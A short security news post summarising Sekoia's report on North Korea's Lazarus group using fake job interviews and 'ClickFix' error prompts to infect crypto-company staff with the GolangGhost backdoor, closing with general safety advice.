Security

7 Alarming Tactics North Korean Hackers Use to Target Crypto Companies

tuffbrownboy


Brand abuse in Lazarus operations
Fake error served to targets
GolangGhost infection chains
Red Report 2025

Introduction

The infamous Lazarus group from North Korea has escalated its cyber attacks on the cryptocurrency sector by employing deceptive ‘ClickFix’ tactics to exploit job seekers, particularly in centralized finance (CeFi).

Evolution of Cyber Threats

According to a report by Sekoia, this strategy marks an evolution from the previous ‘Contagious Interview’ campaign, which targeted job applicants in AI and cryptocurrency sectors. The ClickFix method involves fake error messages on websites or documents that prompt users to execute harmful PowerShell commands, inadvertently installing malware.

Companies Impersonated in Recent Campaigns

  • Coinbase
  • KuCoin
  • Kraken
  • Circle
  • Securitize
  • BlockFi
  • Tether
  • Robinhood
  • Bybit

The Mechanics of ClickFix Attacks

Earlier campaigns by Lazarus involved direct approaches to potential targets via platforms like LinkedIn or X, offering fake job opportunities which led to malware downloads. Starting February 2025, the tactic shifted slightly to so-called ‘ClickFake’ campaigns, which retain elements of the initial phases but incorporate the self-infecting ClickFix strategy.

Profile of New Targets

The focus has now moved from developers to non-tech roles within CeFi organizations, such as business developers and marketing managers. These individuals are lured into remote interviews through seemingly legitimate ReactJS websites, which then exploit OS-specific vulnerabilities to install the GolangGhost backdoor malware.

Staying Safe from Cyber Threats

It’s vital for potential job seekers and organizations to stay alert and verify the legitimacy of any unusual interview requests or job opportunities. Always verify the source and never run unfamiliar commands from untrusted websites on your device.

Preventative Measures and Indicators of Compromise

Sekoia has released Yara rules to help organizations identify and block ClickFake activities. They’ve also shared a comprehensive list of indicators of compromise from Lazarus’s recent campaigns to aid in cybersecurity defenses.

Conclusion

As North Korean hackers continue to refine their malicious strategies, staying informed and vigilant is paramount. By understanding and reacting to the evolving tactics, both individuals and organizations can better protect themselves from these cyber threats.

Related: 20 Best Remote Monitoring Tools

Last Updated: March 31, 2025

Post Views: 28

Related Posts